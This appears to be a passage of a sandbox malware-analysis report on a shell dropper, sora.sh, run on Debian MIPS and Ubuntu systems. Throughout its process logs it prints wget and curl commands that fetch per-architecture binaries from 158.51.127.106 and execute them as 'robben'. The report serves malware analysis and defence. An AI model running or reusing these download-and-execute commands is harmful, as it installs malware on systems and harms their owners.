[chmod +x robben sora.sh systemd-private-8d7ee401a9394427ac9c349829b4f8d7-systemd-timedated.service-VTggM8]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/bin/cat

[cat i586]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/bin/cat

[cat i686]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-08-22 21:52

Reported

2024-08-23 00:21

Platform

debian9-mipsbe-20240418-en

Max time kernel

88s

Max time network

89s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/bin/cat

[cat x86_64]

/bin/chmod

[chmod +x robben sora.sh systemd-private-0d943617c3824028a7503bbf4990add1-systemd-timedated.service-Hq7bX9]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/bin/cat

[cat mips]

/bin/chmod

[chmod +x robben sora.sh systemd-private-0d943617c3824028a7503bbf4990add1-systemd-timedated.service-Hq7bX9]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/bin/cat

[cat mipsel]

/bin/chmod

[chmod +x robben sora.sh systemd-private-0d943617c3824028a7503bbf4990add1-systemd-timedated.service-Hq7bX9]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/bin/cat

[cat arm]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/bin/cat

[cat arm5]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/bin/cat

[cat arm6]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/bin/cat

[cat arm7]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/bin/cat

[cat spc]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/bin/cat

[cat sh4]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/bin/cat

[cat i586]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/bin/cat

[cat i686]

/bin/chmod

[chmod +x robben sora.sh]

/tmp/robben

[./robben Payload]

Network

Country Destination Domain Proto
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp
US 158.51.127.106:80 tcp

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-08-22 21:52

Reported

2024-08-23 00:31

Platform

ubuntu2204-amd64-20240522.1-en

Max time kernel

196s

Max time network

385s

Command Line

[/tmp/sora.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A
N/A /tmp/robben /tmp/robben N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/robben /tmp/sora.sh N/A

Processes

/tmp/sora.sh

[/tmp/sora.sh]

/usr/bin/wget

[wget http://158.51.127.106/bins/x86_64]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mips]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/mipsel]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/mipsel]

/usr/bin/cat

[cat mipsel]

/usr/bin/chmod

[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm5]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm6]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/arm7]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/spc]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/sh4]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i586]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i586]

/usr/bin/cat

[cat i586]

/usr/bin/chmod

[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]

/tmp/robben

[./robben Payload]

/usr/bin/wget

[wget http://158.51.127.106/bins/i686]

/usr/bin/curl

[curl -O http://158.51.127.106/bins/i686]

/usr/bin/cat

[cat i686]

/usr/bin/chmod

[chmod +x gdm3-config-err-2GrcpF robben snap-private-tmp sora.sh systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-ModemManager.service-LzvT6y systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-colord.service-HN37EP systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-power-profiles-daemon.service-UB5PKK systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-switcheroo-control.service-KWclUe systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-logind.service-m2Bhnc systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-oomd.service-5oKTVB systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-systemd-resolved.service-1uKnfM systemd-private-fb1df16c9e3f469cb7dd8c3a63bdcccb-upower.service-Wuo3xP]

/tmp/robben

[./robben Payload]

Network

Country  Destination         Domain  Proto
N/A      224.0.0.251:5353    N/A     udp
US       158.51.127.106:80   N/A     tcp
US       158.51.127.106:80   N/A     tcp
US       158.51.127.106:80   N/A     tcp
US       158.51.127.106:80   N/A     tcp
US       158.51.127.106:80   N/A     tcp
US       158.51.127.106:80   N/A     tcp
US       158.51.127.106:80   N/A     tcp
US       158.51.127.106:80   N/A     tcp
US       158.51.127.106:80   N/A     tcp
US       158.51.127.106:80   N/A     tcp
US       158.51.127.106:80   N/A     tcp
US       158.51.127.106:80   N/A     tcp
US       158.51.127.106:80   N/A     tcp
US       158.51.127.106:80   N/A     tcp
US       158.51.127.106:80   N/A     tcp
US       158.51.127.106:80   N/A     tcp
US       158.51.127.106:80   N/A     tcp
US       158.51.127.106:80   N/A     tcp
US       158.51.127.106:80   N/A     tcp
US       158.51.127.106:80   N/A     tcp
US       158.51.127.106:80   N/A     tcp
US       158.51.127.106:80   N/A     tcp

Files

N/A